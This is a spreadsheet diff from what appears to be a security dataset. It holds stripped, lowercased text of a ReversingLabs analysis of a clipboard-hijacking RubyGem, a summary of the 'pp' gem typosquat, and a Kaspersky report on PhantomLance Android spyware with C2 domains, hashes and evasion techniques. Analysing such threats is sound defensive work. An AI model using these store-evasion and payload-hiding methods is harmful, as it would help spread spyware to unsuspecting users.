'research', 'result', 'malicious', 'ruby', 'package', 'repository', 'logic', 'package', 'manager', 'programming', 'language', 'site', 'statistic', 'repository', 'package', 'gem', 'total', 'download', 'file', 'tape', 'archive', 'basic', 'structure', 'directory', 'binary', 'directory', 'code', 'test', 'directory', 'test', 'rakefile', 'rake', 'makelike', 'program', 'ruby', 'automate', 'test', 'code', 'gemspec', 'file', 'basic', 'metadata', 'author', 'version', 'description', 'additional', 'information', 'extension', 'handy', 'pypi', 'analysis', 'largescale', 'repository', 'analysis', 'rubygem', 'different', 'approach', 'ingestion', 'queue', 'name', 'gem', 'processing', 'titanium', 'platform', 'precise', 'list', 'popular', 'gem', 'baseline', 'weekly', 'basis', 'gem', 'rubygem', 'repository', 'similar', 'name', 'baseline', 'list', 'gem', 'interesting', 'analysis', 'processing', 'gem', 'titanium', 'platform', 'vital', 'step', 'extract', 'file', 'archive', 'format', 'valuable', 'metadata', 'factor', 'analysis', 'first', 'week', 'monitoring', 'gem', 'interesting', 'gem', 'single', 'server', 'processor', 'processing', 'minute', 'second', 'precise', 'titanium', 'platform', 'unpack', 'file', 'unique', 'breakdown', 'interesting', 'file', 'type', 'subtype', 'analysis', 'thing', 'number', 'portable', 'executable', 'file', 'figure', 'file', 'type', 'object', 'file', 'legitimate', 'purpose', 'package', 'close', 'look', 'executable', 'filename', 'extension', 'alarm', 'assume', 'executable', 'file', 'image', 'file', 'detailed', 'look', 'aaapng', 'file', 'executable', 'path', 'figure', 'package', 'content', 'reversinglab', 'a1000', 'rubygem', 'repository', 'gem', 'user', 'account', 'jimcarrey', 'petergibbon', 'high', 'number', 'total', 'download', 'redhanded', 'account', 'petergibbon', 'gem', 'time', 'analysis', 'overall', 'gem', 'rubygem', 'site', '16th', '25th', 'figure', 'petergibbon', 'rubygem', 'site', 'atlasclient', 'rest', 'download', 'count', 'actor', 'intent', 'unsuspecting', 'user', 'figure', 'malicious', 'download', 'close', 'total', 'download', 'legitimate', 'atlasclient', 'time', 'reporting', 'team', 'figure', 'download', 'count', 'atlasclient', 'legit', 'atlasclient', 'extension', 'gemspec', 'file', 'wrap', 'separate', 'library', 'wrapper', 'convention', 'extension', 'directory', 'extconfrb', 'file', 'extconfrb', 'file', 'configure', 'extension', 'installation', 'extension', 'malicious', 'purpose', 'malware', 'user', 'interaction', 'close', 'look', 'gemspec', 'file', 'atlasclient', 'extension', 'line', 'code', 'specextension', 'exttrellislikeunflamingwafflingextconfrb', 'extconfrb', 'script', 'path', 'file', 'check', 'target', 'platform', 'window', 'system', 'rename', 'file', 'figure', 'content', 'extconfrb', 'script', 'analysis', 'executable', 'atlasclient', 'ocra', 'tool', 'window', 'executable', 'file', 'ruby', 'script', 'interpreter', 'dependency', 'script', 'dependency', 'compression', 'ruby', 'script', 'executable', 'vbscript', 'figure', 'ohvbs', 'file', 'figure', 'figure', 'base64', 'malicious', 'vbscript', 'figure', 'malicious', 'script', 'simple', 'vbscript', 'file', 'main', 'malicious', 'loop', 'programdatamicrosoft', 'path', 'persistence', 'mechanism', 'autorun', 'registry', 'essential', 'malware', 'time', 'system', 'malicious', 'script', 'start', 'loop', 'user', 'clipboard', 'datum', 'line', 'text', 'objhtmlparentwindowclipboarddatagetdatatext', 'script', 'clipboard', 'datum', 'match', 'format', 'cryptocurrency', 'wallet', 'address', 'address', 'window', 'clip', 'actor', 'redirect', 'potential', 'cryptocurrency', 'transaction', 'wallet', 'address', 'time', 'blog', 'transaction', 'wallet', 'figure', 'highlevel', 'malware', 'workflow', 'actor', 'responsible', 'previous', 'malicious', 'campaign', 'repository', 'file', 'path', 'attack', 'malicious', 'intent', 'related', 'case', 'unclear', 'repository', 'actor', 'attack', 'window', 'technology', 'campaign', 'specific', 'individual', 'order', 'perfect', 'candidate', 'succumb', 'type', 'sprayandpray', 'supply', 'chain', 'attack', 'ruby', 'developer', 'environment', 'window', 'system', 'bitcoin', 'transaction', 'rare', 'breed', 'rare', 'day', 'software', 'supply', 'chain', 'software', 'distribution', 'platform', 'risk', 'challenging', 'task', 'shoulder', 'operation', 'center', 'business', 'process', 'enabler', 'developer', 'environment', 'organization', 'shipping', 'time', 'reversinglab', 'technology', 'provider', 'modern', 'software', 'development', 'edge', 'titanium', 'platform', 'unique', 'piece', 'static', 'analysis', 'technology', 'breath', 'format', 'coverage', 'ability', 'kind', 'content', 'open', 'source', 'package', 'repository', 'analytical', 'capability', 'format', 'inspect', 'even', 'implication', 'platform', 'unified', 'view', 'software', 'package', 'composition', 'configuration', 'respective', 'digital', 'signature', 'mitigation', 'schedule', 'demo', 'next', 'generation', 'technology', 'software', 'supply', 'chain', 'attack', 'team', 'package', 'user', 'repository', 'additional', 'repository', 'attack', 'blog', 'package', 'password', 'suppy', 'chain', 'malware', 'package', 'manager', 'repository', 'fragment', 'package', 'appiumlib', 'actionmailercachedelivery', 'activemodelvalidator', '62801bbd9af0c97fd4a6cd9a1db5fdf24264f8ff8ca22254f442565c68c517f1', 'asciidoctorbibliography', 'apressvalidator', 'aliyunopensearch', 'aliyunmn', 'affected', 'package', 'file', 'disclosure', 'rubygem', 'team', 'team', 'package', 'speed', 'trend', 'landscape', 'state', 'software', 'supply', 'chain', 'spectra', 'assure', 'software', 'supply', 'chain', 'update', 'understanding', 'buyer', 'software', 'supply', 'chain', 'webinar', 'upgrade', 'report', 'action', 'state', 'supply', 'chain', 'discussion', 'state', 'software', 'supply', 'chain', 'webinar', 'gartner', 'guidance', 'software', 'supply', 'chain', 'risk', 'tag', 'research', 'research', 'blog', 'post', 'supply', 'chain', 'software', 'supply', 'chain', 'number', 'stat', 'state', 'software', 'supply', 'chain', 'recent', 'research', 'survey', 'application', 'development', 'pro', 'research', 'suspicious', 'nuget', 'package', 'data', 'industrial', 'system', 'long', 'driver', 'malicious', 'cyber', 'campaign', 'research', 'team', 'suspicious', 'sqzrframework480', 'campaign', 'devsecop', 'language', 'insight', 'lesson', 'memory', 'safety', 'stubborn', 'dangerous', 'software', 'weakness', 'insight', 'takeaway', 'issue', 'topic', 'blog', 'post', 'supply', 'chain', 'research', 'operation', 'product', 'technology', 'company', 'event', 'linkedin', 'subscribe', 'good', 'blog', 'inbox', 'weekly', 'date', 'trend', 'analysis', 'good', 'practice', 'intelligence', 'software', 'supply', 'chain', 'special', 'report', 'state', 'software', 'supply', 'chain', 'late', 'blog', 'post', 'medical', 'device', 'conversation', 'software', 'supply', 'chain', 'graduate', 'software', 'supply', 'chain', 'glassboard', 'conversation', 'field', 'software', 'package', 'deconstruction', 'video', 'conferencing', 'software', 'risk', 'software', 'supply', 'chain', 'software', 'supply', 'chain', 'hotline', 'immediate', 'assistance', 'software', 'supply', 'chain', 'issue', 'contact', 'response', 'blog', 'webinar', 'demo', 'video', 'news', 'glossary', 'career', 'contact', 'privacy', 'policy', 'cookie', 'right']</t>
         </is>
       </c>
     </row>
@@ -4014,17 +3478,12 @@
       </c>
       <c r="C138" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert rubygems rubygemsorg public notifications fork star code issues pull requests discussions actions wiki insights additional navigation options code issues pull requests discussions actions wiki insights issue question project sign free github account open issue contact maintainers community pick username email address password sign github clicking “sign github” agree terms service privacy statement we’ll occasionally send account related emails already github sign account jump bottom exists rubygemsorg website closed localhostdotdev opened issue comments closed exists rubygemsorg website localhostdotdev opened issue comments assignees comments copy link localhostdotdev commented edited httpsrubygemsorggemspp says namespace reserved rubygemsorg gemfile bundle open reveals actual expected pretty print ruby gemspec specification spec spec name spec version version spec authors claudiob spec email claudiobgmailcom spec description qsuper pretty print spec summary super pretty print spec homepage httpswwwgithubcomclaudiobpp spec license spec files lsfiles split spec executables spec files grep rbin file basename spec testfiles spec files grep rtestspecfeatures spec requirepaths pprun subdomain envcampfiresubdomain roomid envcampfireroomid token envcampfiretoken actually something campfire pinging claudiob case text updated successfully errors encountered reactions copy link member dwradcliffe commented haven’t looked depth guessing nonstdlib version reclaimed name version installed hsbt localhostdotdev reacted thumbs emoji reactions reaction sorry something went wrong copy link member hsbt commented dwradcliffe listed case httpsgistgithubcomhsbtf0ea1c4c214828a09b4d808b72b9bb24 transfer ownership ruby core team handle yank update localhostdotdev reacted thumbs emoji reactions reaction sorry something went wrong copy link member dwradcliffe commented later today hsbt localhostdotdev reacted thumbs emoji reactions reactions sorry something went wrong copy link member dwradcliffe commented hsbt able access reactions sorry something went wrong dwradcliffe assigned hsbt copy link member sonalkr132 commented yanked version nothing thank reporting reactions sorry something went wrong sonalkr132 closed completed copy link parttimelegend commented running legacy project required finding yanked today reactions sorry something went wrong copy link member sonalkr132 commented edited sorry find meant removed back downloaded copy version reactions sorry something went wrong copy link member sonalkr132 commented reuploaded yanked version httpsrubygemsorggemslegacypp sincerely suggest migrating away project reactions sorry something went wrong sign free join conversation github already account sign comment assignees hsbt labels none projects none milestone milestone development branches pull requests participants footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t>The gem name pp was typosquatting on the standard library package of the same name.</t>
         </is>
       </c>
       <c r="D138" t="inlineStr">
         <is>
           <t>https://github.com/rubygems/rubygems.org/issues/1959</t>
-        </is>
-      </c>
-      <c r="E138" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'rubygem', 'public', 'notification', 'star', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'issue', 'question', 'project', 'sign', 'free', 'open', 'issue', 'contact', 'community', 'username', 'email', 'address', 'password', 'sign', 'sign', 'term', 'service', 'privacy', 'statement', 'account', 'email', 'account', 'jump', 'bottom', 'rubygemsorg', 'website', 'issue', 'comment', 'website', 'issue', 'comment', 'comment', 'copy', 'gemfile', 'bundle', 'open', 'actual', 'pretty', 'print', 'gemspec', 'specification', 'spec', 'spec', 'name', 'spec', 'version', 'version', 'spec', 'author', 'claudiob', 'spec', 'email', 'spec', 'description', 'qsuper', 'pretty', 'print', 'spec', 'summary', 'pretty', 'print', 'spec', 'homepage', 'httpswwwgithubcomclaudiobpp', 'spec', 'license', 'spec', 'file', 'lsfile', 'spec', 'spec', 'file', 'file', 'basename', 'spec', 'spec', 'file', 'spec', 'requirepath', 'subdomain', 'envcampfiresubdomain', 'campfire', 'pinging', 'claudiob', 'case', 'text', 'error', 'reaction', 'link', 'depth', 'nonstdlib', 'version', 'name', 'version', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'member', 'case', 'transfer', 'ownership', 'ruby', 'core', 'team', 'yank', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'today', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'able', 'access', 'reaction', 'sorry', 'copy', 'link', 'member', 'version', 'thank', 'reporting', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'legacy', 'project', 'finding', 'today', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'member', 'copy', 'version', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'member', 'version', 'project', 'reaction', 'sorry', 'wrong', 'sign', 'free', 'conversation', 'sign', 'comment', 'hsbt', 'label', 'none', 'none', 'milestone', 'development', 'branch', 'request', 'participant', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -4041,17 +3500,12 @@
       </c>
       <c r="C139" t="inlineStr">
         <is>
-          <t>solutions home products small business employees medium business employees enterprise employees kaspersky companyaccount touch dark mode english russian spanish solutions hybrid cloud learn internet things embedded learn management defense learn industrial cybersecurity learn fraud prevention learn solutions blockchain kaspersky operations center industries national cybersecurity learn industrial cybersecurity learn finance services cybersecurity learn healthcare cybersecurity learn transportation cybersecurity learn retail cybersecurity learn industries telecom cybersecurity blockchain view products kaspersky endpoint business learn kaspersky endpoint detection response learn kaspersky optimum learn kaspersky anti targeted attack platform learn kaspersky managed detection response learn kaspersky sandbox learn products kaspersky mail server kaspersky internet gateway kaspersky embedded systems kaspersky hybrid cloud kaspersky hybrid cloud azure view services kaspersky cybersecurity services learn kaspersky adaptive online training learn kaspersky premium support learn kaspersky intelligence learn kaspersky intelligence reporting learn kaspersky targeted attack discovery learn services kaspersky professional services kaspersky incident response kaspersky cybersecurity training kaspersky incident communications kaspersky awareness view resource center case studies white papers datasheets technologies mitre attck transparency corporate news press center careers innovation sponsorship policy blog contacts gdpr subscribe dark mode login securelist menu english russian spanish existing customers personal kaspersky renew product update product customer support business ksos portal kaspersky business technical support knowledge base renew license home products trialsupdate resource center business small business employees medium business employees enterprise employees securelist threats financial threats mobile threats threats secure environment vulnerabilities exploits spam phishing industrial threats categories reports incidents research malware reports spam phishing reports publications kaspersky bulletin archive tags logbook webinars statistics encyclopedia threats descriptions company transparency corporate news press center careers sponsorships policy blog contacts partners find partner partner program content menu close subscribe kaspersky dark mode threats threats targeted attacks secure environment mobile threats financial threats spam phishing industrial threats threats vulnerabilities exploits categories categories reports malware descriptions bulletin malware reports spam phishing reports technologies research publications sections archive tags webinars logbook statistics encyclopedia threats descriptions reports hiding plain sight phantomlance walks market reports minute read table contents malware versions version version version version spread infrastructure victimology overlaps previous campaigns oceanlotus android campaign oceanlotus macos backdoors summary overlaps kaspersky products verdicts phantomlance android campaign linked oceanlotus macos campaign linked oceanlotus phantomlance malware phantomlance payloadfree versions android campaign domains addresses phantomlance android campaign authors alexey firsh pikman july reported backdoor trojan google play appeared sophisticated unlike common malware often uploaded stealing victims’ money displaying conducted inquiry discovering longterm campaign dubbed “phantomlance” earliest registered domain dating back december found dozens related samples appearing wild since deployed various application marketplaces including google play latest samples published official android market november informed google malware removed market shortly latest example spyware google play disguised browser cleaner investigation discovered various overlaps reported oceanlotus campaigns thus found multiple code similarities previous android campaign well macos backdoors infrastructure overlaps windows backdoors crossplatform resemblances besides attribution details document describes actors’ spreading strategy techniques bypassing market filters malware version diversity latest sample deployed uses firebase decrypt malicious payload also found blackberry cylance research team investigated activity report broken several sections malware versions technical description versions found features relationships spread information specific tactics used actors distributing malware infrastructure details uncovered infrastructure pieces well overlaps found victimology thoughts actors’ interests choosing targets overlaps previous campaigns details similarities related campaigns identified information phantomlance available customers kaspersky intelligence reporting information contact intelreportskasperskycom malware versions purposes research divided samples found series “versions” based technical complexity basic version highly sophisticated version note fully correlate chronological order appearance example observed version samples late year also version functionality samples similar main purpose spyware gather sensitive information basic functionality broad included geolocation call logs contact access access application could also gather list installed applications well device information model version furthermore actor able download execute various malicious payloads thus adapting payload would suitable specific device environment android version installed apps actor able avoid overloading application unnecessary features time gather information needed version attribute latest google play sample 2e06bbc26611305b28b40349a600f95c version clear payload unlike versions drop additional executable file main theory reasons versioning maneuvers attackers trying diverse techniques achieve goal bypass official google marketplace filters achieve even version passed google’s filters uploaded google play store spreading details suspicious permissions mentioned manifest file instead requested dynamically hidden inside executable seems attempt circumventing filtering addition feature seen root privileges accessible device malware reflection call undocumented function “setuidmode” permissions needs without user involvement note trick works android version higher aforementioned operations naturally require root access believe root exploit delivered payload server response collected device info also applications malware mimics notified user work rooted devices instance browser cleaner clean browser cache given root permissions version specimens version also detected earlier samples located google play store november described blog based detection statistics spotted version stamps believe version replacement version observe valuable points main differences version malicious payload packed encrypted file assets directory decrypted first stage using algorithm decryption initialization vector located first bytes encrypted payload decryption asset file look like magic file header contains strings used making reflection calls payload methods firststage code fragment explanations regarding payload loading process version payloads package name “comandroidplaygames” probably mimics official google play games package “comgoogleandroidplaygames” moreover spotted developer version stamps decrypted payloads developer version stamp 65d399e6a77acf7e63ba771877f96f8e 6bf9b834d841b13348851f2dc033773e 8d5c64fdaae76bb74831c0543a7865c3 3285ae59877c6241200f784b62531694 e648a2cc826707aec33208408b882e31 worth mentioning payload manifests contain permission requests stated description version permissions required malicious features granted undocumented android found different certificates used signing version payloads certificate 6bf9b834d841b13348851f2dc033773e serial number 0xa4ed88e620b8262e issuer cnlotvolron validity 65d399e6a77acf7e63ba771877f96f8e 8d5c64fdaae76bb74831c0543a7865c3 serial number 0xd47c08706d440384 issuer cnventoplex validity 3285ae59877c6241200f784b62531694 e648a2cc826707aec33208408b882e31 although validity dates look spoofed cases point real deployment times analyzing payload certificates discovered second ventoplex used sign version payloads well version latest samples phantomlance discovered early introduced technique decrypting payloads malicious payload shipped dropper encrypted stored anywhere dropper sent device using google’s firebase remote config system technical features similar ones observed version tagged generation version able make valid request phantomlance’s firebase response consisted json struct containing decryption “codedisable” value decryption payload entries codedisable 27ypyitp1ufc9tvh appname comozerlabcallrecorder state update entries codedisable 27ypyitp1ufc9tvh appname comozerlabcallrecorder state update important dropper expects decryption stored parameter named “code” specific variant function properly besides noticed firebase previously returned field named “confdisable” value “codedisable” assume actors still tinkering feature another interesting technique actors trying implement thirdstage payload implant secondstage payload 83cd59e3ed1ba15f7a8cadfe9183e156 contains file named “data” 7048d56d923e049ca7f3d97fb5ba9812 corrupted header assets path second stage reads file decrypts rewrites first bytes described results file c399d93146f3d12feb32da23b75304ba appears typical phantomlance payload configured already known servers cloudanofriocom videoviodgercom apianaehlercom thirdstage deployed custom native library named “dataraw” also stored assets path library used achieving persistence infected device appears custom daemonized executable based opensource daemonc superuser tool component previous samples marsdaemon used purpose code comparison library used daemonize third stage payload daemonc source code hosted github version found version used replacement observed deployments version still looks advanced terms technical details version according detection statistics deployment dates application markets version active least valuable points main differences version version firststage dropper appears even obfuscated version uses similar decrypting payload minor differences encrypted content split multiple asset files bytes size plus encrypted config file contains payload decryption details payload decryption sequence decrypt payload config file assets hardcoded name read following values decrypted payload config file order payload decryption class method names reflection calls payload payload integrity check number names split payload parts decrypt payload header hardcoded first stage payload config write payload file using decrypted names split payload parts decrypt content append payload file check integrity resulting payload file comparing value decrypted payload config load payload following reversed code fragment represents actual payload decryption process version payload package name “comandroidprocessgpsp” signed certificate cnventoplex used sign version payloads developer version stamp found version payloads “10298” another notable finding 243e2c6433815f2ecc204ada4821e7d6 sample believe belongs version payload however related dropper spotted wild unlike payloads signed debug certificate obfuscated revealing variableclassmethod names even buildconfig values guess debug developer version somehow leaked conclusion technical review worth saying payloads across different versions even version fact clear payload without dropper share code structure locations sensitive strings addresses stored spread main spreading vector used actors distribution application marketplaces apart comzimicebrowserturbo reported google comphyslaneopengl reported observed tracks indicating many malicious applications deployed google play past removed search results contain link alreadyremoved malware google play applications whose appearance google play confirm package name google play persistence date least comzimicebrowserturbo comphyslaneopengl comunianinadsskipper comcodedexonprayerbook comluxurybeeraddress comluxurybifinball comzonjobbrowsercleaner comlinevialabffont besides identified multiple thirdparty marketplaces unlike google play still host malicious applications httpsapkcombocom httpsapksupport httpsapkpurecom httpsapkpourandroidcom many others example malicious application description vietnamese still available thirdparty marketplace hxxpsandroidappsapkcodetailchamsocbeyeubabycare nearly every case malware deployment actors build fake developer profile creating github account contains fake enduser license agreement eula example reported google google play page contains fake developer email related github account handle registered october github profile part fake developer identity account contains report file described type eula extensive investigation spotted certain tactic often used actors distributing malware initial versions applications uploaded marketplaces contain malicious payloads code dropping payload versions accepted contained nothing suspicious followup versions updated malicious payloads code drop execute payloads able confirm behavior samples able find versions applications without payload example behavior seen skipper httpsapkpureaiadsskipper apkpure versions skipper without malicious payload apkpure thirdparty marketplaces like mentioned table often serve mirror google play simply copy applications metadata google play servers therefore safe assume samples listed table copied google play well infrastructure analyzing server infrastructure quickly identified multiple domains shared similarities previous ones linked known malware samples allowed uncover pieces attackers’ infrastructure example related infrastructure tracking phantomlance’s infrastructure dated back four years noticed expired domain names extended maintenance suggested infrastructure might used future domain registered last updated oslogerbiz log4jvinfo sqllitleverinfo anofriocom anaehlercom viodgercom phantomlance ttps indicate samples configured subdomains servers parent domains resolution checked ones valid resolution found resolved address belongs digitalocean cloud infrastructure provider according domaintools hosts total websites looking records address passive database suggests dozen websites legitimate well aforementioned phantomlance domains interesting overlaps oceanlotus infrastructure browsersyncom known domain used previously publicly reported sample b1990e19efaf88206f7bffe9df0d9419 considered industry oceanlotus cerisecairdcom privately received information indicates domain related oceanlotus well victimology observed around infection attacks android devices india vietnam bangladesh indonesia starting rough cartographic representation countries attempted attacks also seen number detections nepal myanmar malaysia part south asia seems targeted actors note chosen distribution vector publication malicious samples publicly available application stores secondary infection random victims directly related actors’ interests details targeted victims looked types applications malware mimicked apart common luring applications flash plugins cleaners updaters specifically targeted vietnam luxurybeeraddress “tim quan nhau quán nhậu” “find find pubs” vietnamese application finding nearest vietnam codedexonchurchaddress “địa điểm thờ” “church place” publisher description hxxpsapksupportappencomcodedexonchurchaddress translated vietnamese information churches near whole vietnam information patronies priests phone numbers websites email activities holidays… bulknewsexpressnews “tin hàng ngày” “read daily newspaper” mimics vietnamese wwwtin247com mobile news application overlaps previous campaigns section provide correlation phantomlance’s activity previously reported campaigns related oceanlotus oceanlotus android campaign antiy labs published report httpswwwantiynetpanalysisoftheattackofmobiledevicesbyoceanlotus described android malware campaign claiming related oceanlotus checked provided indicators using information telemetry found first tracks samples date back december important note according detection statistics majority users affected campaign located vietnam exception small number individuals located china main infection vector seems links malicious applications hosted thirdparty websites possibly distributed email spearphishing attacks examples referring victim malware first request last request hxxpdownloadcomvnandroiddownloadnhaccuatuidownloader31798 hxxp113171224175videoplayernhaccuatuidownloaderapk hxxpnhaccuatuiandroidzyngacdncomnhaccuatuidownloaderapk hxxpwwwmediafirecomfile1elber8zl34tag4framarootxproapk hxxpdownload1825mediafirecomtyxddh46orzg1elber8zl34tag4framarootxproapk latest registered malware download event occurred december observed small amount activity judging volume hosted malware number detections observed main campaign took place late best visualize similarities discovered made code structure comparison sample reported oceanlotus android campaign 0e7c2adda3bc65242a365ef72b91f3a8 unobfuscated probably developer version phantomlance payload 243e2c6433815f2ecc204ada4821e7d6 code structure comparison sample linked oceanlotus phantomlance payload despite multiple differences observed similar pattern used malware implementation seems developers renamed “module” “plugin” meaning remains overlapping classes look quite similar functionality example comparison methods contained parser classes parser 0e7c2adda3bc65242a365ef72b91f3a8 parserwriterreader 243e2c6433815f2ecc204ada4821e7d6 public void appendbooleanboolean public void appendbooleanboolean value public void appendbytebyte data public void appendbytebyte value public void appendbytesbyte data public void appendbytesbyte value public void appenddoubledouble public void appenddoubledouble value public void appendintint public void appendintint value public void appendlonglong public void appendlonglong value private void appendnumberobject value public void appendshortshort public void appendshortshort value public void appendstringstring public void appendstringstring value public byte getcontents public byte getcontents public void appendfloatfloat public boolean getboolean public boolean getboolean public byte getbyte public byte getbyte public byte getbytes public byte getbytes public double getdouble public double getdouble public float getfloat public getint public getint public long getlong public long getlong public short getshort public short getshort byte getsignal public string getstring public string getstring getstringofnumber using malware attribution technology phantomlance payloads least similar ones oceanlotus android campaign oceanlotus macos backdoors multiple public reports macos backdoors linked industry oceanlotus examined order find possible overlaps caveat really difficult compare malware implemented completely different platforms since different programming languages obviously used implementation process however analysis macos payload 306d3ed0a7c899b5ef9d0e3c91f05193 dated early able catch minor tracks code pattern used android malware implementation described particular three seven main classes names similar functionality “converter” “packet” “parser” summary overlaps another notable attribution token applies oceanlotus malware across platforms usage three redundant different servers sample mostly subdomains example samples examined oceanlotus windows malware described private report servers description 0d5c03da348dce513bf575545493f3e3 mineremaariegarciacom eggstralisemariegarcom apianaehlercom phantomlance android d1eb52ef6c2445c848157beaba54044f sadmaknrowzcom ckoendmkatticom itpkmostmkrucom oceanlotus android campaign 306d3ed0a7c899b5ef9d0e3c91f05193 sslarkouthriecom s3hiahornbercom widgetshoreoacom oceanlotus macos backdoor 51f9a7d4263b3a565dec7083ca00340f psandreagahuvrauvincom pastechristienollmachexyz attillagedrivestraliaxyz oceanlotus windows backdoor based complete analysis previous campaigns actors’ interests victims located vietnam infrastructure overlaps phantomlance oceanlotus windows multiple code similarities android campaign macos backdoors attribute android activity campaign phantomlance oceanlotus medium confidence considering timeline android campaigns believe activity reported antiy labs previous campaign conducted oceanlotus phantomlance successor active since summarizing results research able assess scope evolution actors’ android activity operating almost years kaspersky products verdicts phantomlance heurbackdoorandroidosphantomlance heurtrojandropperandroidosdnolder android campaign linked oceanlotus heurtrojanandroidosagenteu heurtrojanandroidosagentvg heurtrojandownloaderandroidosagentgv macos campaign linked oceanlotus heurbackdoorosxoceanlotus phantomlance malware 2e06bbc26611305b28b40349a600f95c b1990e19efaf88206f7bffe9df0d9419 7048d56d923e049ca7f3d97fb5ba9812 e648a2cc826707aec33208408b882e31 3285ae59877c6241200f784b62531694 8d5c64fdaae76bb74831c0543a7865c3 6bf9b834d841b13348851f2dc033773e 0d5c03da348dce513bf575545493f3e3 0e7c2adda3bc65242a365ef72b91f3a8 a795f662d10040728e916e1fd7570c1d d23472f47833049034011cad68958b46 8b35b3956078fc28e5709c5439e4dcb0 af44bb0dd464680395230ade0d6414cd 65d399e6a77acf7e63ba771877f96f8e 79f06cb9281177a51278b2a33090c867 b107c35b4ca3e549bdf102de918749ba 83cd59e3ed1ba15f7a8cadfe9183e156 c399d93146f3d12feb32da23b75304ba 83c423c36ecda310375e8a1f4348a35e 94a3ca93f1500b5bd7fd020569e46589 54777021c34b0aed226145fde8424991 872a3dd2cd5e01633b57fa5b9ac4648d 243e2c6433815f2ecc204ada4821e7d6 phantomlance payloadfree versions a330456d7ca25c88060dc158049f3298 a097b8d49386c8aab0bb38bbfdf315b2 7285f44fa75c3c7a27bbb4870fc0cdca b4706f171cf98742413d642b6ae728dc 8008bedaaebc1284b1b834c5fd9a7a71 0e7b59b601a1c7ecd6f2f54b5cd8416a android campaign 0e7c2adda3bc65242a365ef72b91f3a8 50bfd62721b4f3813c2d20b59642f022 5079cb166df41233a1017d5e0150c17a 810ef71bb52ea5c3cfe58b8e003520dc c630ab7b51f0c0fa38a4a0f45c793e24 ce5bae8714ddfca9eb3bb24ee60f042d d61c18e577cfc046a6252775da12294f fe15c0eacdbf5a46bc9b2af9c551f86a 07e01c2fa020724887fc39e5c97eccee 2e49775599942815ab84d9de13e338b3 315f8e3da94920248676b095786e26ad 641f0cc057e2ab43f5444c5547e80976 domains addresses phantomlance mineremaariegarciacom eggstralisemariegarcom apianaehlercom cloudanofriocom videoviodgercom termursulapauletcom incgraceneufvillecom logoslogerbiz filelog4jvinfo newssqllitleverinfo usjaxonsorensenclub staffkristianfiedlerclub bitcatalinabonamicom hrhalettebiermanncom cynettebiermahaletcom android campaign mtkbaimindcom mingchujongcom mokkhagoongnamcom ckoendmkatticom sadmaknrowzcom itpkmostmkrucom akivipersecom game2015net taiphanmemfacebookmoiinfo nhaccuatuiandroidzyngacdncom quamvipersecom janggoongnamcom apple macos backdoor google android malware descriptions malware technologies spyware trojandropper authors alexey firsh pikman hiding plain sight phantomlance walks market email address published required fields marked name email cancel gross posted april guys missed httpswwwblackberrycomcontentdamblackberrycomassetenterprisepdfdirectmobilemalwarereportpdf reply tarek posted april thanks interesting research curious algeria high numbers despite primary target stats reply gary posted downloaded rooted apps iphone android connected phones pretty sure watching messing think might even stolen stimulus check supposed deposited days reply gibb posted excellent information really interested individual possible form peruse greater detail also blackberry report interesting thanks reply table contents malware versions version version version version spread infrastructure victimology overlaps previous campaigns oceanlotus android campaign oceanlotus macos backdoors summary overlaps kaspersky products verdicts phantomlance android campaign linked oceanlotus macos campaign linked oceanlotus phantomlance malware phantomlance payloadfree versions android campaign domains addresses phantomlance android campaign great webinars 100pm great ideas balalaika edition boris larin denis legezo 1200pm great ideas green edition john hultquist brian bartholomew suguru ishimaru vitaly kamluk seongsu park yusuke niwa motohiko sato 100pm great ideas powered malware attribution nextgen honeypots marco preuss denis legezo costin raiu kurt baumgartner demeter yaroslav shmelev 200pm great ideas powered actors advance fronts ivan kwiatkowski maher yamout noushin shabab pierre delcher félix aime giampaolo dedola santiago pontiroli 200pm great ideas powered hunting techniques dmitry bestuzhev costin raiu pierre delcher brian bartholomew boris larin ariel jungheit fabio assolini authors exploit chain deploys lightspy featurerich malware beware stalkerware busygasper unfriendly who’s zeroday vulnerability telegram subscribe weekly emails hottest research right inbox email agree provide email address kaspersky lab” receive information posts site understand withdraw consent time email clicking “unsubscribe” link find bottom email sent purposes mentioned subscribe category hrserv previously unknown shell used attack modern asian groups’ tactics techniques procedures ttps cascade compromise unveiling lazarus’ campaign catch wild triangle stripedfly perennially flying radar latest posts malware reports android malware android malware android malware great posts patched windows attack surface still exploitable elsayed 